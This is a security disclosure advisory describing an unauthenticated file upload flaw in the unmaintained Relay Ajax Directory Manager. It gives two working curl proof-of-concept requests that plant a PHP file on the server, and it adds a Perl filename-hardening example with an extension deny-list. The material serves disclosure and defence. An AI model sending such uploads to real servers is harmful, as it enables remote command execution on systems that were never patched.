Advisory: Unauthenticated File Upload in Relay Ajax Directory Manager may
Lead to Remote Command Execution

A vulnerability within the Relay Ajax Directory Manager web application
allows unauthenticated attackers to upload arbitrary files to the web
server running the web application.

Details
=======

Product: Relay Ajax Directory Manager
Affected Versions: relayb01-071706, 1.5.1, 1.5.3 were tested, other
                   versions most likely vulnerable as well.
Fixed Versions: -
Vulnerability Type: Unauthenticated File Upload
Security Risk: high
Vendor URL: https://github.com/HadoDokis/Relay-Ajax-Directory-Manager
Vendor Status: decided not to fix, project is unmaintained
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2016-005
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH

Introduction
============

Relay Ajax Directory Manager[1], also known as relay[2], is a web-based
file manager. It allows files and folders to be uploaded via drag and
drop and provides several other features, such as a thumbnail preview
for images and basic user authentication functionality.

More Details
============

While the web application itself is mostly written in PHP, it also
utilizes the Perl script 'upload.pl' for handling uploads initiated by
the user. Uploading is a multi-step process:

1. The user initiates a multipart/form-data upload request through the
   web application. This request is sent to the Perl script and the
   following steps are handled by it.
2. A temporary file containing the entire request (including headers)
   is created. This temporary file is named partly by the first URL
   parameter, as shown in the following listing.
3. The headers and the POST body of the request are parsed and filtered
   to determine the final filename.
4. The upload is written to the final destination.
5. A file containing statistics about the upload process is written.

During steps 2-5, no checks are performed to ensure that the user is
sufficiently authenticated. The following listing shows parts of the
upload Perl script:

-- upload.pl -----------------------------------------------------------
[...]
@qstring=split(/&/,$ENV{'QUERY_STRING'});
$sessionid = $qstring[0];
[...]
$tmpfile = "$uploadsFolder\\temp_$sessionid";
$statsfile = "$uploadsFolder\\stats_$sessionid.txt";
$tmpfilepre= "$uploadsFolder\\$sessionid\_";
[...]
open(FILE,">","$tmpfilepre$filename") or print "can't open temp file";
binmode(FILE);
print FILE $filedata;
close FILE;
[...]
------------------------------------------------------------------------

Here, the first URL parameter is stored in the variable $sessionid. The
content of this variable is then used as a prefix for the filename for
the uploaded data before it ultimately gets written. Given the
configured upload directory, which is 'uploads/' by default, the URL of
the uploaded file can be determined.

The web application usually requires users to be authenticated before
any actions (e.g. uploading) can be performed, but since the Perl script
is not secured by any form of authentication, it can be accessed by
anyone. If the web server does not prohibit the execution of e.g. PHP
files within the upload directory, arbitrary PHP commands can be
executed by uploading the respective files to the web server.

Proof of Concept
================

In general, the Perl script expects a request containing
multipart/form-data. In this case, the name specified in the 'filename'
field is prepended with the first URL parameter. Using the command line
HTTP client curl, a request like the following can be made to a
vulnerable installation of Relay Ajax Directory Manager in order to
upload a PHP script which invokes the function 'phpinfo()':

$ curl -i -s -k -X 'POST' \
    -H 'Content-Type: multipart/form-data; boundary=----------------------------83ff53821b7c' \
    --data-binary $'------------------------------83ff53821b7c\x0d\x0a'\
    $'Content-Disposition: form-data; filename=\"info.php\"\x0d\x0a'\
    $'Content-Type: application/octet-stream\x0d\x0a\x0d\x0a'\
    $'<?php phpinfo(); ?>\x0d\x0a'\
    $'------------------------------83ff53821b7c--' \
    'http://example.com/relay-1-5-3/upload.pl?redteam'

The server responds with HTTP status code 200 indicating a successful
upload:

HTTP/1.1 200 OK
Date: Mon, 09 May 2016 11:09:50 GMT
Server: Apache/2.4.18 (Debian)
Content-Length: 0
Content-Type: text/plain

Such a request would yield the following files in the web server's
upload directory upon success:

$ ls relay-1-5-3/uploads/
redteam_info.php  stats_redteam.txt  temp_redteam

The file redteam_info.php contains the file data extracted from the
multipart/form-data request that was sent to the upload.pl script:

$ cat relay-1-5-3/uploads/redteam_info.php
<?php phpinfo(); ?>

Requesting this file with the URL
http://example.com/relay-1-5-3/uploads/redteam_info.php will then yield
the server's output of the phpinfo() function.

However, since the entire content of the upload request is saved to a
temporary file, a regular POST request containing only the code to be
executed is sufficient to exploit this vulnerability. The following
invocation of curl uploads the same PHP script which invokes the
function 'phpinfo()':

$ curl --silent --include --data '<?php phpinfo(); ?>' \
    'http://example.com/relay-1-5-3/upload.pl?redteam.php'

In the server's upload directory, the file temp_redteam.php contains the
data that was sent to the upload.pl script:

$ ls relay-1-5-3/uploads/
stats_redteam.php.txt  temp_redteam.php
$ cat temp_redteam.php
<?php phpinfo(); ?>

Requesting this file with the URL
http://example.com/relay-1-5-3/uploads/temp_redteam.php will again yield
the server's output of the phpinfo() function.

Using either of these methods, an attacker is able to upload arbitrary
files to the affected web server, e.g. in order to easily execute PHP
commands with the privileges of the web server.

Workaround
==========

One possible workaround would be to prevent the execution of files in
the upload directory and deliver them as attachments instead.

Fix
===

None.

Security Risk
=============

This vulnerability allows unauthenticated attackers to upload arbitrary
files to the affected system. In the web server's and project's default
configuration it is very likely that this may be used to execute
arbitrary commands with the privileges of the web server process. This
is possible without authentication, thereby providing no barrier for
attackers. It is therefore rated as a high risk. Since this software is
quite old and not well maintained, it is likely that additional
vulnerabilities exist. However, this was not further evaluated.
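The filename construction shown in the upload.pl listing under More Details is where the attacker-controlled query string reaches the filesystem; the following Perl is an added example, not code from the Relay project, of how that step could be hardened. safe_upload_path() is a hypothetical helper; its inputs ($uploadsFolder, $sessionid from the first query-string field, $filename from the multipart Content-Disposition header) are the ones the original script uses, fed here with constructed sample values.

```perl
#!/usr/bin/perl
# Added example, not code from the Relay project: a hardened replacement for
# the filename construction in upload.pl. safe_upload_path() is a hypothetical
# helper; its inputs are the ones the original script uses ($uploadsFolder,
# $sessionid from the first query-string field, $filename from the multipart
# Content-Disposition header). It returns undef for anything that must not
# be written.
use strict;
use warnings;
use File::Spec;

sub safe_upload_path {
    my ($uploadsFolder, $sessionid, $filename) = @_;

    # The original uses $sessionid verbatim, so "?redteam.php" produced
    # temp_redteam.php. Allow only a short alphanumeric token: no dots, so it
    # can never supply an extension, and no slashes or backslashes.
    return undef unless defined $sessionid
        && $sessionid =~ /^([A-Za-z0-9]{1,32})$/;
    my $sid = $1;

    # Reduce the client-supplied name to its basename and restrict it to a
    # conservative character class that cannot start with a dot.
    return undef unless defined $filename;
    (my $base = $filename) =~ s{^.*[\\/]}{};
    return undef unless $base =~ /^([A-Za-z0-9_-][A-Za-z0-9._-]{0,63})$/;
    $base = $1;

    # Deny extensions the web server may execute, anywhere in the name, so
    # that info.php.txt is rejected as well. Illustrative list; an allow-list
    # of the expected upload types is stricter.
    return undef if $base =~ /\.(php\d*|phtml|phar|pl|cgi|sh|htaccess)(\.|$)/i;

    # The same validated $sid should also be used for the temp_ and stats_
    # files the original script creates.
    return File::Spec->catfile($uploadsFolder, "${sid}_$base");
}

# Constructed inputs mirroring the advisory's two proof-of-concept requests,
# a traversal attempt and a benign upload.
for my $case (['redteam', 'info.php'], ['redteam.php', 'x'],
              ['../etc', 'a.txt'], ['redteam', 'photo.jpg']) {
    my $path = safe_upload_path('uploads', @$case);
    printf "%-12s %-10s -> %s\n", @$case, defined $path ? $path : 'rejected';
}
```

This covers only the filename handling; the missing authentication check still has to be added at the top of upload.pl before the temporary, stats or final files are created, and the Workaround above (no execution in the upload directory) applies regardless.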
Timeline
========

2015-11-19 Vulnerability discovered
2016-04-07 Customer approved disclosure of vulnerability
2016-05-12 Developers contacted, project is no longer maintained
2016-05-31 Advisory published

References
==========

[1] https://github.com/HadoDokis/Relay-Ajax-Directory-Manager
[2] https://code.google.com/p/relay/

RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/